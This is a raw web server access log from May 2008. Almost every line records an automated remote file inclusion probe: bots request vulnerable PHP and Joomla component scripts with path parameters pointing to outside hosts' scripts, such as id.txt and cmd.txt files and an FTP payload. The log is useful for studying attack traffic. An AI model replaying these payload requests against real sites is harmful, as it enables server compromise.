137.204.107.138 - - [02/May/2008:10:56:59 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:57:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:57:09 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:57:10 -0700] "GET /logs/access_080114.log//tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:57:11 -0700] "GET //tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:57:11 -0700] "GET /logs//tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:57:11 -0700] "GET /logs/access_080215.log//tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:57:17 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:57:17 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:57:17 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:57:21 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:57:29 -0700] "GET /logs/access_080114.log//tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:57:29 -0700] "GET //tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:57:30 -0700] "GET /logs//tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:57:30 -0700] "GET /logs/access_080215.log//tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.137.18 - - [02/May/2008:10:57:45 -0700] "GET /modules/My_eGallery/index.php?basepath=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:10:57:46 -0700] "GET /logs/index1.php?pagina=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:10:57:51 -0700] "GET /index1.php?pagina=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:58:00 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [02/May/2008:10:58:13 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.core-media.org/paler.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [02/May/2008:10:58:14 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.core-media.org/paler.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:58:18 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:58:20 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:10:58:20 -0700] "GET /logs/index1.php?x=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:58:20 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:10:58:21 -0700] "GET /index1.php?x=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:58:21 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:58:21 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:58:22 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:58:25 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:58:27 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:58:28 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:58:34 -0700] "GET /logs//tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:58:35 -0700] "GET //tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:58:37 -0700] "GET /logs//tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:58:37 -0700] "GET //tags.php?BBCodeFile=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:58:51 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:10:58:51 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:10:58:52 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:10:58:58 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:59:04 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:59:04 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:59:04 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:59:23 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:59:34 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:59:34 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:59:38 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:59:41 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:59:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:59:41 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:59:43 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:59:45 -0700] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:59:46 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:59:47 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:10:59:58 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.153.103.135 - - [02/May/2008:11:00:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
202.153.103.135 - - [02/May/2008:11:00:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:00:08 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:00:29 -0700] "GET /logs/access.log/index1.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:00:29 -0700] "GET /index1.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:00:29 -0700] "GET /logs/index1.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.93 - - [02/May/2008:11:00:48 -0700] "GET /logs/access_071126.log HTTP/1.0" 200 40511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.152 - - [02/May/2008:11:00:48 -0700] "GET /logs/access_070706.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:00:51 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:01:11 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:01:11 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:01:11 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:11:01:37 -0700] "GET /logs/index.php?include=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:11:01:38 -0700] "GET /index.php?include=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:02:14 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:02:25 -0700] "GET /logs/access_080304.log/joomla/index.php?option=com_restaurante&task=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:02:30 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:11:03:01 -0700] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:11:03:01 -0700] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:11:03:01 -0700] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:03:09 -0700] "GET /logs/access_080215.log/index1.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:03:38 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:03:44 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:03:49 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:11:04:25 -0700] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:11:04:25 -0700] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:04:32 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:04:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:04:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.22.150.131 - - [02/May/2008:11:04:36 -0700] "GET /logs//?pag=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 45702 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:04:38 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:04:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:04:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:04:39 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.168.250.60 - - [02/May/2008:11:04:43 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
200.168.250.60 - - [02/May/2008:11:04:43 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
189.22.150.131 - - [02/May/2008:11:04:49 -0700] "GET //?pag=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:11:04:53 -0700] "GET /logs/forum.php?act=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:11:04:54 -0700] "GET /forum.php?act=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:11:05:45 -0700] "GET /logs/access_080302.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:11:05:54 -0700] "GET /logs/access_080304.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:06:18 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:06:40 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:06:56 -0700] "GET /logs/access_080114.log/modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:07:09 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:07:12 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:07:12 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:07:14 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:07:14 -0700] "GET /logs/access_080222.log/index.php?oldal=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:07:14 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:07:18 -0700] "GET /index.php?oldal=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.89.199 - - [02/May/2008:11:07:18 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.core-media.org/paler.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:07:19 -0700] "GET /logs/index.php?oldal=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [02/May/2008:11:07:26 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [02/May/2008:11:07:26 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [02/May/2008:11:07:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.162.6 - - [02/May/2008:11:07:27 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.253.162.6 - - [02/May/2008:11:07:27 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.253.162.6 - - [02/May/2008:11:07:28 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
